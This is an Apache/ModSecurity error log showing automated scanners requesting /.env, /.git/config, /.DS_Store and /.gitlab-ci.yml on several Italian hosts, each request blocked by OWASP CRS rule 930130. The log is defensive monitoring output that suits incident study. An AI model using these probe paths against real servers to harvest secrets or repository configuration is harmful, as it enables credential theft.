[Fri Nov 14 08:21:04.513847 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRbYYIFul5RAtD2RIn8lrAAAAAk"]
[Fri Nov 14 08:21:04.517443 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRbYYIFul5RAtD2RIn8lrAAAAAk"]
[Fri Nov 14 08:21:04.517647 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRbYYIFul5RAtD2RIn8lrAAAAAk"]
[Fri Nov 14 09:01:39.154426 2025] [:error] [pid 53001] [client 213.209.157.81:48660] [client 213.209.157.81] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbh4_j_UXugoCa73D8wDAAAAAA"]
[Fri Nov 14 09:01:39.154723 2025] [:error] [pid 53001] [client 213.209.157.81:48660] [client 213.209.157.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbh4_j_UXugoCa73D8wDAAAAAA"]
[Fri Nov 14 09:01:39.154885 2025] [:error] [pid 53001] [client 213.209.157.81:48660] [client 213.209.157.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbh4_j_UXugoCa73D8wDAAAAAA"]
[Fri Nov 14 10:04:51.302603 2025] [authz_core:error] [pid 58437] [client 178.128.207.138:36242] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 14 10:04:52.857978 2025] [:error] [pid 58438] [client 178.128.207.138:36282] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRbwtKy4nZmROj2c6f59OgAAAAc"]
[Fri Nov 14 10:04:52.858204 2025] [:error] [pid 58438] [client 178.128.207.138:36282] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRbwtKy4nZmROj2c6f59OgAAAAc"]
[Fri Nov 14 10:04:52.858385 2025] [:error] [pid 58438] [client 178.128.207.138:36282] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRbwtKy4nZmROj2c6f59OgAAAAc"]
[Fri Nov 14 10:04:53.193443 2025] [:error] [pid 56435] [client 178.128.207.138:36286] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRbwtf-6MEPSrDJmqNQ2nAAAAAY"]
[Fri Nov 14 10:04:53.193677 2025] [:error] [pid 56435] [client 178.128.207.138:36286] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRbwtf-6MEPSrDJmqNQ2nAAAAAY"]
[Fri Nov 14 10:04:53.193836 2025] [:error] [pid 56435] [client 178.128.207.138:36286] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRbwtf-6MEPSrDJmqNQ2nAAAAAY"]
[Fri Nov 14 10:04:53.559276 2025] [:error] [pid 53001] [client 178.128.207.138:36298] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRbwtfj_UXugoCa73D8wFAAAAAA"]
[Fri Nov 14 10:04:53.559524 2025] [:error] [pid 53001] [client 178.128.207.138:36298] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRbwtfj_UXugoCa73D8wFAAAAAA"]
[Fri Nov 14 10:04:53.559691 2025] [:error] [pid 53001] [client 178.128.207.138:36298] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRbwtfj_UXugoCa73D8wFAAAAAA"]
[Fri Nov 14 10:54:38.045388 2025] [authz_core:error] [pid 51834] [client 164.90.228.79:48158] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 14 10:54:38.347912 2025] [:error] [pid 56435] [client 164.90.228.79:48182] [client 164.90.228.79] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRb8Xv-6MEPSrDJmqNQ2pAAAAAY"]
[Fri Nov 14 10:54:38.348183 2025] [:error] [pid 56435] [client 164.90.228.79:48182] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRb8Xv-6MEPSrDJmqNQ2pAAAAAY"]
[Fri Nov 14 10:54:38.348346 2025] [:error] [pid 56435] [client 164.90.228.79:48182] [client 164.90.228.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRb8Xv-6MEPSrDJmqNQ2pAAAAAY"]
[Fri Nov 14 10:54:38.400564 2025] [:error] [pid 58107] [client 164.90.228.79:48196] [client 164.90.228.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRb8XlbKiGPnv5WtSejadgAAAAQ"]
[Fri Nov 14 10:54:38.400837 2025] [:error] [pid 58107] [client 164.90.228.79:48196] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRb8XlbKiGPnv5WtSejadgAAAAQ"]
[Fri Nov 14 10:54:38.401022 2025] [:error] [pid 58107] [client 164.90.228.79:48196] [client 164.90.228.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRb8XlbKiGPnv5WtSejadgAAAAQ"]
[Fri Nov 14 10:54:38.452737 2025] [:error] [pid 58438] [client 164.90.228.79:48202] [client 164.90.228.79] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRb8Xqy4nZmROj2c6f59QgAAAAc"]
[Fri Nov 14 10:54:38.452976 2025] [:error] [pid 58438] [client 164.90.228.79:48202] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRb8Xqy4nZmROj2c6f59QgAAAAc"]
[Fri Nov 14 10:54:38.453133 2025] [:error] [pid 58438] [client 164.90.228.79:48202] [client 164.90.228.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRb8Xqy4nZmROj2c6f59QgAAAAc"]
[Fri Nov 14 17:08:49.525875 2025] [:error] [pid 53002] [client 44.243.71.169:39506] [client 44.243.71.169] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRdUETGmu4POMgYE2zsmigAAAAU"]
[Fri Nov 14 17:08:49.526149 2025] [:error] [pid 53002] [client 44.243.71.169:39506] [client 44.243.71.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRdUETGmu4POMgYE2zsmigAAAAU"]
[Fri Nov 14 17:08:49.526331 2025] [:error] [pid 53002] [client 44.243.71.169:39506] [client 44.243.71.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRdUETGmu4POMgYE2zsmigAAAAU"]
[Fri Nov 14 21:07:56.436046 2025] [authz_core:error] [pid 68373] [client 209.97.180.8:59642] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 14 21:07:56.814534 2025] [:error] [pid 67725] [client 209.97.180.8:59662] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aReMHNFrPSbj54ookFRz_QAAAAw"]
[Fri Nov 14 21:07:56.814776 2025] [:error] [pid 67725] [client 209.97.180.8:59662] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aReMHNFrPSbj54ookFRz_QAAAAw"]
[Fri Nov 14 21:07:56.814945 2025] [:error] [pid 67725] [client 209.97.180.8:59662] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aReMHNFrPSbj54ookFRz_QAAAAw"]
[Fri Nov 14 21:07:56.904846 2025] [:error] [pid 68333] [client 209.97.180.8:59666] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aReMHKguIfU7wMsMii7RwAAAAAQ"]
[Fri Nov 14 21:07:56.905071 2025] [:error] [pid 68333] [client 209.97.180.8:59666] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aReMHKguIfU7wMsMii7RwAAAAAQ"]
[Fri Nov 14 21:07:56.905224 2025] [:error] [pid 68333] [client 209.97.180.8:59666] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aReMHKguIfU7wMsMii7RwAAAAAQ"]
[Fri Nov 14 21:07:56.994551 2025] [:error] [pid 66065] [client 209.97.180.8:59680] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aReMHCP93Sa-N0ULUoXnEAAAAAA"]
[Fri Nov 14 21:07:56.994778 2025] [:error] [pid 66065] [client 209.97.180.8:59680] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aReMHCP93Sa-N0ULUoXnEAAAAAA"]
[Fri Nov 14 21:07:56.994950 2025] [:error] [pid 66065] [client 209.97.180.8:59680] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aReMHCP93Sa-N0ULUoXnEAAAAAA"]
[Sat Nov 15 00:42:01.469476 2025] [:error] [pid 75386] [client 45.148.10.246:41856] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe-SQ45q16zgndymTMyJgAAAAE"]
[Sat Nov 15 00:42:01.469724 2025] [:error] [pid 75386] [client 45.148.10.246:41856] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe-SQ45q16zgndymTMyJgAAAAE"]
[Sat Nov 15 00:42:01.469894 2025] [:error] [pid 75386] [client 45.148.10.246:41856] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe-SQ45q16zgndymTMyJgAAAAE"]
